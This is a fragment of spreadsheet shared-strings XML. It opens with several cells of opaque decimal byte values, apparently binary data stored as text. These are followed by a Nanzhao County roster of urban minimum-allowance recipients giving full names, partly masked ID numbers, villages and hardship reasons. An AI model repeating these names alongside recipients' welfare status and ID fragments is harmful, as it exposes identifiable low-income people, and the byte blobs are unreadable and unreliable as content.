    <t xml:space="preserve">226 154 170 51 228 91 127 159 46 239 57 154 37 239 170 205 144 139 102 102 200 63 237 202 144 95 125 61 83 254 37 240 255 37 132 249 20 120 119 229 129 60 112 191 188 34 83 206 41 74 151 159 249 143 52 249 98 124 134 220 210 145 33 159 152 152 37 191 147 146 37 231 190 145 37 191 5 105 101 64 62 63 123 97 137 252 220 154 116 249 191 236 153 242 143 33 237 55 64 254 37 73 153 242 67 240 123 183 48 157 148 31 83 196 98 250 220 19 78 182 5 48 109 60 95 12 155 4 254 124 106 248 226 88 125 98 147 213 9 180 141 232 17 162 133 68 29 68 187 136 38 19 189 72 180 148 104 55 209 83 68 15 18 245 18 125 153 104 42 81 51 209 62 162 140 211 241 72 95 163 251 114 162 187 136 14 16 189 71 212 67 52 141 104 22 81 39 209 26 162 183 136 174 35 106 33 110 115 232 254 50 209 60 162 110 162 55 136 246 242 144 68 15 19 189 74 244 1 209 219 68 167 18 157 73 180 149 168 157 104 34 209 179 68 55 19 237 33 218 78 180 159 232 105 162 39 137 46 35 106 229 121 39 217 142 211 125 39 209 125 68 23 19 189 67 244 16 209 6 162 57 68 175 88 241 237 184 91 39 58 89 223 221 160 54 164 67 183 165 113 235 205 132 35 45 47 207 207 62 177 96 153 180 227 191 207 136 159 127 224 155 157 155 141 38 219 132 5 141 5 140 142 30 89 56 15 159 226 70 186 119 146 147 174 169 112 197 208 121 41 156 163 94 239 242 8 248 89 28 78 218 63 106 152 136 225 248 38 212 237 147 201 204 3 238 94 120 142 223 87 113 255 166 108 213 146 199 250 167 167 135 213 165 221 97 174 49 65 11 33 253 83 156 44 49 25 210 235 119 80 130 22 22 218 173 198 95 182 204 4 222 136 189 19 156 172 149 113 35 40 184 81 230 143 210 222 209 180 166 183 158 5 179 169 187 163 143 63 90 190 122 33 77 231 44 39 187 5 153 193 60 173 198 118 0 215 116 250 253 37 183 83 222 2 169 237 132 235 14 182 133 126 125 173 253 170 91 251 109 180 102 169 94 211 239 197 31 245 97 216 6 163 219 253 127 3 88 239 180 189 246 52 </t>
  </si>
  <si>
    <t xml:space="preserve">168 31 175 65 189 209 218 67 42 184 223 219 253 120 203 231 5 62 231 137 77 199 190 243 155 154 247 218 199 208 185 218 38 106 43 122 232 1 183 102 137 7 1 121 46 158 200 121 117 78 226 97 173 14 126 189 2 97 227 180 254 23 191 7 183 241 214 144 95 95 211 236 113 45 208 87 105 150 202 240 59 94 28 80 243 28 11 125 57 70 91 241 252 27 93 147 219 229 241 44 90 72 31 42 75 242 132 149 95 52 72 138 227 34 182 101 74 215 204 174 44 12 201 250 106 15 56 30 233 246 74 106 175 27 251 130 211 87 177 163 186 170 246 50 254 209 83 240 156 87 227 241 208 135 95 224 203 45 199 54 146 97 222 149 200 163 16 226 109 22 188 111 232 121 247 134 120 123 7 241 14 179 27 161 109 111 7 221 8 248 45 177 138 90 38 99 67 219 93 224 159 50 7 255 96 21 191 183 233 45 45 172 14 179 180 192 68 188 193 191 243 102 108 164 118 34 52 158 92 110 254 171 125 110 83 133 231 11 243 18 105 107 1 97 28 99 131 194 159 222 122 241 228 119 215 78 177 190 213 202 190 199 178 150 189 133 111 254 133 87 58 139 221 101 43 217 220 130 125 59 206 183 222 216 145 190 237 251 237 203 220 73 149 41 37 146 67 43 59 252 136 141 163 254 39 155 187 154 210 158 229 79 39 149 174 160 116 240 157 242 120 220 31 253 144 111 175 235 215 30 238 19 153 2 231 139 54 147 180 189 241 202 202 29 91 170 138 93 213 57 46 180 189 90 237 13 250 173 108 220 57 200 175 172 170 177 196 229 5 42 220 104 87 24 42 116 181 238 121 105 147 55 247 5 157 59 167 185 129 223 175 110 116 161 113 225 32 175 188 70 87 83 179 199 155 237 118 85 63 175 247 135 123 52 204 174 221 99 98 116 191 14 143 204 115 109 207 174 242 120 244 242 232 188 215 213 232 252 243 235 169 169 4 221 208 130 10 240 235 68 100 126 87 214 53 213 234 203 1 221 165 245 27 234 106 53 63 16 134 155 75 70 59 230 141 193 112 16 162 180 94 68 230 225 188 141 217 85 222 208 125 125 195 206 32 95 204 59 149 154 206 13 97 214 213 54 133 202 118 141 171 14 </t>
  </si>
  <si>
    <t xml:space="preserve">219 161 107 21 157 147 200 19 211 158 173 93 28 42 115 136 23 150 183 13 91 48 130 62 159 107 235 106 189 97 233 134 165 35 210 102 58 185 33 72 89 149 39 84 86 193 124 64 29 8 150 63 220 135 229 105 125 93 80 70 173 79 197 241 89 187 239 156 18 49 23 21 254 87 116 240 17 128 222 189 33 112 103 239 157 100 55 14 231 53 175 82 103 84 227 127 2 175 47 222 105 135 94 180 164 236 89 191 235 206 165 220 126 43 4 88 116 211 95 113 207 95 49 224 175 232 241 87 92 244 87 156 242 87 116 249 43 142 251 43 14 158 193 169 208 162 110 229 156 23 146 252 228 251 254 163 13 112 245 31 245 16 117 19 45 39 154 71 52 139 104 26 209 84 162 22 162 3 15 145 246 17 189 65 244 50 209 139 68 59 137 30 6 74 201 41 231 90 31 98 98 178 73 181 225 108 47 176 4 103 144 129 229 56 215 252 232 31 240 116 5 27 78 98 11 21 31 10 80 168 218 112 50 27 232 15 140 83 58 144 95 113 153 90 52 245 230 7 190 238 111 37 201 83 221 87 82 157 172 12 194 224 228 119 81 247 222 115 24 98 73 82 71 247 103 55 2 253 138 130 12 84 27 78 143 183 250 62 77 218 55 23 186 222 211 102 38 181 249 125 14 120 112 6 181 123 252 10 101 199 231 68 170 96 6 47 249 240 5 204 156 236 100 151 124 152 49 236 175 149 14 188 83 20 44 134 192 52 154 123 95 115 247 66 218 110 243 100 77 118 245 221 192 85 69 193 2 228 57 82 175 23 186 19 39 163 191 223 183 153 248 150 139 57 159 66 105 22 41 29 152 92 177 226 67 174 133 242 98 69 193 0 69 170 13 103 245 126 223 213 135 24 7 11 50 142 36 192 59 37 255 56 228 7 30 243 132 84 27 78 175 149 142 52 206 7 217 21 114 33 129 57 50 43 150 205 170 13 39 226 123 47 38 243 124 225 216 194 243 133 70 194 149 220 227 16 1 93 144 44 46 44 182 250 186 147 246 161 198 137 204 100 21 144 245 93 27 192 226 193 114 85 109 184 52 224 101 172 38 249 126 194 134 87 154 253 15 121 105 254 4 179 238 255 17 214 18 165 163 47 88 156 </t>
  </si>
  <si>
    <t xml:space="preserve">234 53 46 88 22 4 241 255 136 138 89 20 118 57 61 141 154 59 121 129 200 31 47 44 197 151 198 31 102 241 172 231 241 24 229 84 174 161 18 80 109 184 130 114 207 130 233 240 71 254 81 161 138 70 245 164 72 84 52 107 161 90 156 167 175 58 139 110 10 78 170 13 151 40 242 12 33 131 106 59 196 157 92 64 238 228 121 57 61 73 95 121 74 100 85 188 99 81 212 226 197 171 182 78 94 207 133 240 169 156 43 247 228 217 83 124 13 60 229 227 92 80 11 15 130 75 40 165 3 29 197 110 180 165 173 218 22 83 149 193 55 163 16 45 84 242 187 32 224 157 65 85 197 194 217 166 242 36 203 121 121 69 43 225 81 90 177 77 229 121 50 5 43 14 14 181 129 13 93 197 216 128 79 82 186 253 84 85 251 68 85 245 31 237 37 247 13 17 86 161 88 192 184 143 103 30 253 33 181 195 220 179 147 60 55 244 64 113 224 186 49 48 13 87 146 88 11 119 66 92 40 93 173 236 177 116 3 185 93 190 110 239 138 173 123 179 76 205 79 43 249 61 144 67 92 137 6 242 187 158 90 153 236 247 157 5 86 75 87 90 27 147 84 219 102 238 29 32 63 37 217 135 61 163 191 99 51 56 62 22 79 161 81 130 11 194 248 126 230 93 182 117 239 211 166 230 12 37 183 167 48 156 99 183 224 152 40 56 146 135 146 200 217 41 155 144 93 162 198 14 93 212 106 76 238 238 73 88 212 81 222 32 138 84 148 24 224 73 39 74 32 63 174 161 177 223 192 46 87 189 30 184 10 89 12 228 37 198 17 111 168 252 228 15 101 214 64 141 89 82 109 103 233 157 36 138 214 97 75 164 58 215 42 172 17 242 242 89 72 229 51 103 152 185 57 223 43 125 60 42 84 96 32 157 89 42 116 95 158 164 239 208 176 43 11 249 104 162 42 202 46 117 72 33 221 87 33 206 240 88 229 183 1 31 159 135 87 192 6 170 128 33 62 91 47 229 238 195 30 208 203 11 20 135 143 66 55 46 194 85 27 110 83 20 246 5 238 105 189 147 162 180 242 74 70 97 69 160 169 212 69 232 163 221 166 160 135 121 208 78 170 143 84 90 184 27 242 209 158 207 241 69 </t>
  </si>
  <si>
    <t xml:space="preserve">186 111 225 75 228 45 36 48 141 182 76 174 105 239 52 247 32 132 197 253 147 211 15 38 225 171 199 246 113 134 186 55 106 224 151 124 216 0 22 195 240 224 87 176 178 239 189 99 13 244 248 199 4 148 7 56 18 126 205 236 95 101 9 248 204 216 69 174 74 132 218 98 133 128 74 254 193 162 96 151 214 75 217 182 67 207 112 227 97 168 69 6 150 119 106 163 76 254 69 109 20 40 167 225 134 54 104 174 131 204 235 82 131 21 15 203 147 154 142 146 127 170 72 72 219 158 170 181 86 33 109 223 67 109 188 59 78 210 14 232 165 189 163 147 246 222 67 146 22 82 46 226 221 179 214 189 170 239 98 248 43 1 171 127 124 160 208 236 47 50 7 10 45 254 34 75 192 153 232 95 153 40 75 238 147 148 185 83 80 132 180 27 117 13 10 238 6 101 111 142 168 194 215 121 250 103 33 220 105 18 202 23 42 194 171 84 186 88 8 202 134 139 197 193 126 132 15 147 148 112 79 192 2 162 230 153 65 206 64 158 197 255 53 74 120 85 34 151 137 122 26 144 203 119 11 175 43 205 129 14 100 138 210 249 110 147 143 94 192 104 162 233 6 140 143 55 42 29 30 93 131 14 107 139 161 193 66 116 209 74 71 42 15 59 196 184 20 234 96 47 132 87 69 100 109 21 172 7 215 218 252 30 237 125 99 53 0 114 10 73 87 145 12 1 178 40 192 113 244 56 8 36 172 17 224 70 226 133 64 254 237 26 63 233 250 86 62 183 49 240 97 197 133 131 26 28 3 240 204 10 237 131 237 122 146 13 210 71 210 96 63 60 59 4 120 2 240 117 192 183 1 175 3 254 22 240 30 160 37 141 177 20 192 57 128 78 192 114 64 55 224 14 192 253 128 71 0 95 3 60 11 88 34 177 182 119 224 122 11 240 46 224 0 224 168 217 140 205 0 92 8 232 4 60 6 97 138 225 186 25 208 11 184 27 240 18 248 93 6 60 4 247 39 240 25 220 95 1 60 5 247 151 1 223 3 236 3 252 20 15 104 77 135 181 41 224 76 192 197 128 121 128 223 0 252 87 8 15 235 160 54 55 220 127 19 176 29 240 8 224 247 0 223 6 124 15 240 54 224 61 64 243 </t>
  </si>
  <si>
    <t xml:space="preserve">83 176 86 5 76 5 76 7 92 12 152 243 20 47 143 72 29 170 202 236 181 213 245 180 204 174 172 170 145 43 183 54 120 171 234 88 172 245 86 180 245 142 126 29 66 28 106 106 119 84 110 207 88 28 226 216 232 218 190 96 200 149 24 95 97 69 95 151 13 177 146 141 182 210 12 73 176 104 161 110 197 203 133 30 106 253 171 173 175 98 172 128 117 171 34 253 106 54 44 197 5 25 181 97 50 52 106 94 80 198 77 181 161 82 205 118 63 223 228 125 126 56 235 195 200 117 183 88 55 195 219 244 120 86 55 215 209 249 240 98 225 44 202 186 138 191 190 168 171 89 144 226 133 70 93 14 171 93 13 222 188 170 186 26 143 171 145 133 189 173 200 92 208 203 20 111 188 144 199 195 227 174 163 172 52 195 215 174 225 43 79 146 192 83 191 109 208 123 26 84 106 220 43 230 138 91 191 194 14 139 21 206 185 49 202 238 70 248 186 155 13 185 3 129 59 28 95 176 31 17 109 191 33 123 173 254 29 68 174 174 245 171 124 96 181 189 217 195 227 68 180 58 109 87 131 158 185 90 27 98 174 242 117 187 47 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 127 25 128 191 161 207 162 163 14 233 52 111 86 206 88 27 234 215 57 225 138 159 114 210 132 85 141 80 56 19 233 31 183 197 240 63 60 200 63 142 45 104 198 223 231 179 182 133 112 189 12 215 69 205 100 208 102 80 124 212 1 29 24 36 23 215 239 180 152 162 251 167 198 240 79 139 225 159 5 151 194 149 192 79 2 25 132 142 117 121 54 215 19 215 220 237 217 60 190 230 238 202 97 172 79 23 254 240 26 70 231 159 117 69 156 226 104 161 115 12 203 88 9 171 164 179 96 139 225 110 45 91 207 10 192 141 167 190 174 102 220 152 238 57 243 239 31 134 126 85 192 88 164 253 17 51 27 108 145 36 135 104 25 233 92 106 231 122 173 101 117 116 98 21 194 76 138 85 10 79 209 30 76 147 208 235 228 231 232 32 140 54 119 153 209 238 137 9 100 242 138 147 194 182 69 225 148 67 97 28 108 49 224 211 116 93 69 101 51 135 180 103 </t>
  </si>
  <si>
    <t xml:space="preserve">53 123 209 152 198 78 200 81 21 217 164 65 64 75 100 219 137 43 234 131 78 128 176 92 255 187 134 53 147 174 167 62 108 164 102 56 35 254 168 29 172 201 19 126 14 16 2 234 143 59 132 17 3 7 133 13 231 31 25 35 60 252 56 8 191 86 28 24 211 8 87 212 111 13 73 212 68 86 210 106 232 152 23 70 117 31 45 75 175 167 82 218 70 121 226 250 176 92 182 186 168 241 230 209 81 52 174 224 251 140 99 118 187 68 109 2 107 202 130 102 187 221 74 150 113 176 30 45 108 182 90 185 11 107 217 162 102 180 37 161 153 115 208 172 231 116 199 108 177 162 229 181 181 137 179 86 219 240 22 176 141 117 119 99 44 149 254 81 57 154 46 248 167 210 55 218 33 251 1 75 127 11 82 85 237 111 105 96 73 16 186 191 129 241 43 11 187 82 163 77 106 99 227 122 241 102 220 93 126 233 29 86 95 195 229 0 60 0 237 28 58 155 110 200 125 119 2 96 82 20 220 195 216 37 85 23 71 229 54 55 236 188 111 10 150 83 155 244 213 150 211 159 20 14 168 9 13 122 151 170 38 180 8 15 11 255 164 158 208 194 61 180 79 236 218 243 160 187 129 133 185 67 69 253 85 184 219 219 245 238 144 11 221 232 186 123 87 115 135 187 16 134 114 253 31 131 26 21 206 171 234 3 182 7 26 192 116 24 163 18 0 241 186 103 128 153 212 225 227 10 117 32 78 85 7 86 168 234 125 53 54 132 215 115 83 180 33 66 47 235 16 242 46 219 163 94 120 48 125 96 197 131 132 251 234 131 233 128 123 238 171 159 171 67 227 121 245 254 131 229 234 253 11 231 213 129 101 43 224 250 197 242 14 89 94 221 127 254 242 50 102 113 6 24 96 128 1 6 24 48 124 248 95 253 </t>
  </si>
  <si>
    <t>南召县城镇低保金发放花名册</t>
  </si>
  <si>
    <t>序
号</t>
  </si>
  <si>
    <t>乡镇</t>
  </si>
  <si>
    <t>单位、村</t>
  </si>
  <si>
    <t>姓名</t>
  </si>
  <si>
    <t>身份证号</t>
  </si>
  <si>
    <t>行政区划</t>
  </si>
  <si>
    <t>家庭
人口</t>
  </si>
  <si>
    <t>人均
月补</t>
  </si>
  <si>
    <t>月领取金额</t>
  </si>
  <si>
    <t>享受时间</t>
  </si>
  <si>
    <t>致困原因</t>
  </si>
  <si>
    <t>0001</t>
  </si>
  <si>
    <t>城关镇</t>
  </si>
  <si>
    <t>东北六组</t>
  </si>
  <si>
    <t>张同强</t>
  </si>
  <si>
    <t>412921********001X</t>
  </si>
  <si>
    <t>4113210103</t>
  </si>
  <si>
    <t>2023年4月前</t>
  </si>
  <si>
    <t>生活困难</t>
  </si>
  <si>
    <t>0002</t>
  </si>
  <si>
    <t>张成霞</t>
  </si>
  <si>
    <t>412921********074X</t>
  </si>
  <si>
    <t>0003</t>
  </si>
  <si>
    <t>中华村</t>
  </si>
  <si>
    <t>石洪文</t>
  </si>
  <si>
    <t>412921********0017</t>
  </si>
  <si>
    <t>4113210108</t>
  </si>
  <si>
    <t>0004</t>
  </si>
  <si>
    <t>王世瑞</t>
  </si>
  <si>
    <t>412921********002X</t>
  </si>
  <si>
    <t>0005</t>
  </si>
  <si>
    <t>贝亚迅</t>
  </si>
  <si>
    <t>412921********0021</t>
  </si>
  <si>
    <t>0006</t>
  </si>
  <si>
    <t>高学升</t>
  </si>
  <si>
    <t>412921********0076</t>
  </si>
  <si>
    <t>0007</t>
  </si>
  <si>
    <t>贺业凤</t>
  </si>
  <si>
    <t>412921********0208</t>
  </si>
  <si>
    <t>0008</t>
  </si>
  <si>
    <t>东北四组</t>
  </si>
  <si>
    <t>刘献兰</t>
  </si>
  <si>
    <t>412921********0022</t>
  </si>
  <si>
    <t>0009</t>
  </si>
  <si>
    <t>随伟</t>
  </si>
  <si>
    <t>412921********006X</t>
  </si>
  <si>
    <t>0010</t>
  </si>
  <si>
    <t>赵清运</t>
  </si>
  <si>
    <t>412921********037X</t>
  </si>
  <si>
    <t>0011</t>
  </si>
  <si>
    <t>魏厚宽</t>
  </si>
  <si>
    <t>412921********0036</t>
  </si>
  <si>
    <t>0012</t>
  </si>
  <si>
    <t>魏承启</t>
  </si>
  <si>
    <t>411321********0015</t>
  </si>
  <si>
    <t>0013</t>
  </si>
  <si>
    <t>西北村</t>
  </si>
  <si>
    <t>闫书强</t>
  </si>
  <si>
    <t>412921********0019</t>
  </si>
  <si>
    <t>4113210106</t>
  </si>
  <si>
    <t>0014</t>
  </si>
  <si>
    <t>曹瑞霞</t>
  </si>
  <si>
    <t>412921********0027</t>
  </si>
  <si>
    <t>0015</t>
  </si>
  <si>
    <t>东北五组</t>
  </si>
  <si>
    <t>王作芳</t>
  </si>
  <si>
    <t>412921********0029</t>
  </si>
  <si>
    <t>0016</t>
  </si>
  <si>
    <t>王学芳</t>
  </si>
  <si>
    <t>412921********0052</t>
  </si>
  <si>
    <t>0017</t>
  </si>
  <si>
    <t>李丰明</t>
  </si>
  <si>
    <t>0018</t>
  </si>
  <si>
    <t>芦元六</t>
  </si>
  <si>
    <t>412921********0030</t>
  </si>
  <si>
    <t>0019</t>
  </si>
  <si>
    <t>梁世代</t>
  </si>
  <si>
    <t>412921********0018</t>
  </si>
  <si>
    <t>0020</t>
  </si>
  <si>
    <t>北外村</t>
  </si>
  <si>
    <t>郭春凤</t>
  </si>
  <si>
    <t>412921********0023</t>
  </si>
  <si>
    <t>4113210102</t>
  </si>
  <si>
    <t>0021</t>
  </si>
  <si>
    <t>黄梅兰</t>
  </si>
  <si>
    <t>412921********0020</t>
  </si>
  <si>
    <t>0022</t>
  </si>
  <si>
    <t>冀钦亭</t>
  </si>
  <si>
    <t>412921********0069</t>
  </si>
  <si>
    <t>0023</t>
  </si>
  <si>
    <t>巩心亮</t>
  </si>
  <si>
    <t>412921********0154</t>
  </si>
  <si>
    <t>0024</t>
  </si>
  <si>
    <t>高萍</t>
  </si>
  <si>
    <t>0025</t>
  </si>
  <si>
    <t>廉春梅</t>
  </si>
  <si>
    <t>412921********0028</t>
  </si>
  <si>
    <t>0026</t>
  </si>
  <si>
    <t>葛中原</t>
  </si>
  <si>
    <t>412921********0011</t>
  </si>
  <si>
    <t>0027</t>
  </si>
  <si>
    <t>石兴兰</t>
  </si>
  <si>
    <t>412921********0066</t>
  </si>
  <si>
    <t>0028</t>
  </si>
  <si>
    <t>吉怀东</t>
  </si>
  <si>
    <t>412921********0032</t>
  </si>
  <si>
    <t>0029</t>
  </si>
  <si>
    <t>邵伟</t>
  </si>
  <si>
    <t>0030</t>
  </si>
  <si>
    <t>乔国英</t>
  </si>
  <si>
    <t>0031</t>
  </si>
  <si>
    <t>东北一组</t>
  </si>
  <si>
    <t>王召红</t>
  </si>
  <si>
    <t>412921********0026</t>
  </si>
  <si>
    <t>0032</t>
  </si>
  <si>
    <t>崔书清</t>
  </si>
  <si>
    <t>412921********005X</t>
  </si>
  <si>
    <t>0033</t>
  </si>
  <si>
    <t>石龙秀</t>
  </si>
  <si>
    <t>412921********0081</t>
  </si>
  <si>
    <t>0034</t>
  </si>
  <si>
    <t>张庆发</t>
  </si>
  <si>
    <t>0035</t>
  </si>
  <si>
    <t>张秀昌</t>
  </si>
  <si>
    <t>412921********0016</t>
  </si>
  <si>
    <t>0036</t>
  </si>
  <si>
    <t>黄国珍</t>
  </si>
  <si>
    <t>412921********0042</t>
  </si>
  <si>
    <t>0037</t>
  </si>
  <si>
    <t>王天合</t>
  </si>
  <si>
    <t>412921********0034</t>
  </si>
  <si>
    <t>0038</t>
  </si>
  <si>
    <t>贺立敏</t>
  </si>
  <si>
    <t>412921********0024</t>
  </si>
  <si>
    <t>0039</t>
  </si>
  <si>
    <t>王中塑</t>
  </si>
  <si>
    <t>411321********0010</t>
  </si>
  <si>
    <t>0040</t>
  </si>
  <si>
    <t>张德明</t>
  </si>
  <si>
    <t>412921********003X</t>
  </si>
  <si>
    <t>0041</t>
  </si>
  <si>
    <t>张红丽</t>
  </si>
  <si>
    <t>411326********0048</t>
  </si>
  <si>
    <t>0042</t>
  </si>
  <si>
    <t>杨大强</t>
  </si>
  <si>
    <t>0043</t>
  </si>
  <si>
    <t>汤孝全</t>
  </si>
  <si>
    <t>0044</t>
  </si>
  <si>
    <t>贺小伟</t>
  </si>
  <si>
    <t>0045</t>
  </si>
  <si>
    <t>李士军</t>
  </si>
  <si>
    <t>0046</t>
  </si>
  <si>
    <t>耿中香</t>
  </si>
  <si>
    <t>412921********0063</t>
  </si>
  <si>
    <t>0047</t>
  </si>
  <si>
    <t>樊长合</t>
  </si>
  <si>
    <t>0048</t>
  </si>
  <si>
    <t>王金杰</t>
  </si>
  <si>
    <t>0049</t>
  </si>
  <si>
    <t>张国恒</t>
  </si>
  <si>
    <t>412921********0073</t>
  </si>
  <si>
    <t>0050</t>
  </si>
  <si>
    <t>吴凤菊</t>
  </si>
  <si>
    <t>412921********0049</t>
  </si>
  <si>
    <t>0051</t>
  </si>
  <si>
    <t>王兴付</t>
  </si>
  <si>
    <t>0052</t>
  </si>
  <si>
    <t>柯长荣</t>
  </si>
  <si>
    <t>0053</t>
  </si>
  <si>
    <t>李小芳</t>
  </si>
  <si>
    <t>0054</t>
  </si>
  <si>
    <t>张钦溥</t>
  </si>
  <si>
    <t>411323********4312</t>
  </si>
  <si>
    <t>0055</t>
  </si>
  <si>
    <t>邵明超</t>
  </si>
  <si>
    <t>412921********0039</t>
  </si>
  <si>
    <t>0056</t>
  </si>
  <si>
    <t>赵长莲</t>
  </si>
  <si>
    <t>0057</t>
  </si>
  <si>
    <t>熊景元</t>
  </si>
  <si>
    <t>0058</t>
  </si>
  <si>
    <t>王秀枝</t>
  </si>
  <si>
    <t>412921********004X</t>
  </si>
  <si>
    <t>0059</t>
  </si>
  <si>
    <t>靳德全</t>
  </si>
  <si>
    <t>0060</t>
  </si>
  <si>
    <t>钟天丰</t>
  </si>
  <si>
    <t>412921********0126</t>
  </si>
  <si>
    <t>0061</t>
  </si>
  <si>
    <t>梁世隆</t>
  </si>
  <si>
    <t>412921********0031</t>
  </si>
  <si>
    <t>0062</t>
  </si>
  <si>
    <t>陈献芳</t>
  </si>
  <si>
    <t>0063</t>
  </si>
  <si>
    <t>华祖凤</t>
  </si>
  <si>
    <t>412921********0047</t>
  </si>
  <si>
    <t>0064</t>
  </si>
  <si>
    <t>梁士忠</t>
  </si>
  <si>
    <t>412921********0055</t>
  </si>
  <si>
    <t>0065</t>
  </si>
  <si>
    <t>王荣敏</t>
  </si>
  <si>
    <t>412921********0085</t>
  </si>
  <si>
    <t>0066</t>
  </si>
  <si>
    <t>黎金贵</t>
  </si>
  <si>
    <t>412921********5113</t>
  </si>
  <si>
    <t>0067</t>
  </si>
  <si>
    <t>杨金满</t>
  </si>
  <si>
    <t>0068</t>
  </si>
  <si>
    <t>闫雪珍</t>
  </si>
  <si>
    <t>412921********0040</t>
  </si>
  <si>
    <t>0069</t>
  </si>
  <si>
    <t>林青</t>
  </si>
  <si>
    <t>0070</t>
  </si>
  <si>
    <t>郭天华</t>
  </si>
  <si>
    <t>0071</t>
  </si>
  <si>
    <t>刘成华</t>
  </si>
  <si>
    <t>0072</t>
  </si>
  <si>
    <t>蔺运梅</t>
  </si>
  <si>
    <t>412921********1546</t>
  </si>
  <si>
    <t>0073</t>
  </si>
  <si>
    <t>王玉芝</t>
  </si>
  <si>
    <t>0074</t>
  </si>
  <si>
    <t>代欣震</t>
  </si>
  <si>
    <t>0075</t>
  </si>
  <si>
    <t>李长生</t>
  </si>
  <si>
    <t>412921********0013</t>
  </si>
  <si>
    <t>0076</t>
  </si>
  <si>
    <t>赵芝兰</t>
  </si>
  <si>
    <t>412921********0041</t>
  </si>
  <si>
    <t>0077</t>
  </si>
  <si>
    <t>谷秀荣</t>
  </si>
  <si>
    <t>0078</t>
  </si>
  <si>
    <t>范永梅</t>
  </si>
  <si>
    <t>0079</t>
  </si>
  <si>
    <t>李山仁</t>
  </si>
  <si>
    <t>412921********5535</t>
  </si>
  <si>
    <t>0080</t>
  </si>
  <si>
    <t>孔相珍</t>
  </si>
  <si>
    <t>412921********5529</t>
  </si>
  <si>
    <t>0081</t>
  </si>
  <si>
    <t>曹会荣</t>
  </si>
  <si>
    <t>412921********0127</t>
  </si>
  <si>
    <t>0082</t>
  </si>
  <si>
    <t>李广丰</t>
  </si>
  <si>
    <t>0083</t>
  </si>
  <si>
    <t>王东兴</t>
  </si>
  <si>
    <t>412921********0077</t>
  </si>
  <si>
    <t>0084</t>
  </si>
  <si>
    <t>彭中华</t>
  </si>
  <si>
    <t>412921********0121</t>
  </si>
  <si>
    <t>0085</t>
  </si>
  <si>
    <t>张金丰</t>
  </si>
  <si>
    <t>0086</t>
  </si>
  <si>
    <t>李世林</t>
  </si>
  <si>
    <t>0087</t>
  </si>
  <si>
    <t>凌根发</t>
  </si>
  <si>
    <t>0088</t>
  </si>
  <si>
    <t>楚德献</t>
  </si>
  <si>
    <t>0089</t>
  </si>
  <si>
    <t>王功会</t>
  </si>
  <si>
    <t>412921********4823</t>
  </si>
  <si>
    <t>0090</t>
  </si>
  <si>
    <t>孙庆阁</t>
  </si>
  <si>
    <t>0091</t>
  </si>
  <si>
    <t>薛世华</t>
  </si>
  <si>
    <t>0092</t>
  </si>
  <si>
    <t>胡铖赟</t>
  </si>
  <si>
    <t>411321********0072</t>
  </si>
  <si>
    <t>0093</t>
  </si>
  <si>
    <t>铁俊生</t>
  </si>
  <si>
    <t>0094</t>
  </si>
  <si>
    <t>李小元</t>
  </si>
  <si>
    <t>412921********0012</t>
  </si>
  <si>
    <t>0095</t>
  </si>
  <si>
    <t>郭凤凤</t>
  </si>
  <si>
    <t>0096</t>
  </si>
  <si>
    <t>曹会生</t>
  </si>
  <si>
    <t>0097</t>
  </si>
  <si>
    <t>王天娥</t>
  </si>
  <si>
    <t>412921********0083</t>
  </si>
  <si>
    <t>0098</t>
  </si>
  <si>
    <t>张国杰</t>
  </si>
  <si>
    <t>0099</t>
  </si>
  <si>
    <t>曾祥峰</t>
  </si>
  <si>
    <t>412921********4011</t>
  </si>
  <si>
    <t>0100</t>
  </si>
  <si>
    <t>李太贵</t>
  </si>
  <si>
    <t>412921********0054</t>
  </si>
  <si>
    <t>0101</t>
  </si>
  <si>
    <t>谷晓华</t>
  </si>
  <si>
    <t>412921********0044</t>
  </si>
  <si>
    <t>0102</t>
  </si>
  <si>
    <t>张文琴</t>
  </si>
  <si>
    <t>412921********014X</t>
  </si>
  <si>
    <t>0103</t>
  </si>
  <si>
    <t>杜明显</t>
  </si>
  <si>
    <t>412921********4031</t>
  </si>
  <si>
    <t>0104</t>
  </si>
  <si>
    <t>李太伟</t>
  </si>
  <si>
    <t>412921********4839</t>
  </si>
  <si>
    <t>0105</t>
  </si>
  <si>
    <t xml:space="preserve">王德环 </t>
  </si>
  <si>
    <t>412921********0424</t>
  </si>
  <si>
    <t>0106</t>
  </si>
  <si>
    <t>张金太</t>
  </si>
  <si>
    <t>412921********3310</t>
  </si>
  <si>
    <t>0107</t>
  </si>
  <si>
    <t>郭春香</t>
  </si>
  <si>
    <t>0108</t>
  </si>
  <si>
    <t>赵长玲</t>
  </si>
  <si>
    <t>0109</t>
  </si>
  <si>
    <t>李士清</t>
  </si>
  <si>
    <t>412921********0046</t>
  </si>
  <si>
    <t>0110</t>
  </si>
  <si>
    <t>陈士良</t>
  </si>
  <si>
    <t>0111</t>
  </si>
  <si>
    <t>余贵海</t>
  </si>
  <si>
    <t>412921********0057</t>
  </si>
  <si>
    <t>2024年7月前</t>
  </si>
  <si>
    <t>0112</t>
  </si>
  <si>
    <t>张成立</t>
  </si>
  <si>
    <t>0113</t>
  </si>
  <si>
    <t>郭清焕</t>
  </si>
  <si>
    <t>0114</t>
  </si>
  <si>
    <t>周庆雷</t>
  </si>
  <si>
    <t>0115</t>
  </si>
  <si>
    <t>席清兰</t>
  </si>
  <si>
    <t>0116</t>
  </si>
  <si>
    <t>闫玉华</t>
  </si>
  <si>
    <t>0117</t>
  </si>
  <si>
    <t>赵国生</t>
  </si>
  <si>
    <t>0118</t>
  </si>
  <si>
    <t>王春芝</t>
  </si>
  <si>
    <t>412921********0025</t>
  </si>
  <si>
    <t>0119</t>
  </si>
  <si>
    <t>赵阳</t>
  </si>
  <si>
    <t>411326********0011</t>
  </si>
  <si>
    <t>0120</t>
  </si>
  <si>
    <t>潘兴焕</t>
  </si>
  <si>
    <t>0121</t>
  </si>
  <si>
    <t>杨玉芝</t>
  </si>
  <si>
    <t>0122</t>
  </si>
  <si>
    <t>赵双</t>
  </si>
  <si>
    <t>0123</t>
  </si>
  <si>
    <t>宋少润</t>
  </si>
  <si>
    <t>412921********0061</t>
  </si>
  <si>
    <t>0124</t>
  </si>
  <si>
    <t>石玲玲</t>
  </si>
  <si>
    <t>0125</t>
  </si>
  <si>
    <t>赵海武</t>
  </si>
  <si>
    <t>0126</t>
  </si>
  <si>
    <t>栗芳</t>
  </si>
  <si>
    <t>0127</t>
  </si>
  <si>
    <t>曹会省</t>
  </si>
  <si>
    <t>412921********0037</t>
  </si>
  <si>
    <t>0128</t>
  </si>
  <si>
    <t>牛进风</t>
  </si>
  <si>
    <t>0129</t>
  </si>
  <si>
    <t>郭春兰</t>
  </si>
  <si>
    <t>0130</t>
  </si>
  <si>
    <t>李元华</t>
  </si>
